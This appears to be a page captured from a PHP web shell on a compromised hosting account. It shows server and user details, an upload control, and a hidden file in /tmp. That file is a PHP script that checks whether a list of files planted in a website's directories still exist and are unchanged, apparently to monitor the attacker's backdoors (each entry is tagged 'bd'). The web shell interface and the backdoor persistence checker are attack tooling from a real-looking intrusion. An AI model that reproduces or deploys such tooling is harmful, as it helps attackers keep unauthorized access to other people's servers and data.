HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.component
<?php   $r = '/home/vitanhod/prostanur.vitavit.com.pk'; $x = ["/orderemail_bk.php"=>"bd@@1269095@@17",
"/includes/configOnline.php"=>"bd@@1269198@@81",
"/includes/config.php"=>"bd@@1269411@@19",
"/includes/themeGenerator.php"=>"bd@@1276552@@959",
"/pcltrace.lib.php"=>"bd@@1268456@@798",
"/img/Archive.php"=>"bd@@1276408@@54",
"/img/Archive.php"=>"bd@@1269555@@945",
"/pcltrace.php"=>"bd@@1309817@@907",
"/pcltrace.lib.php"=>"bd@@1276289@@73",
"/includes/themeGenerator.php"=>"bd@@1279467@@54"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');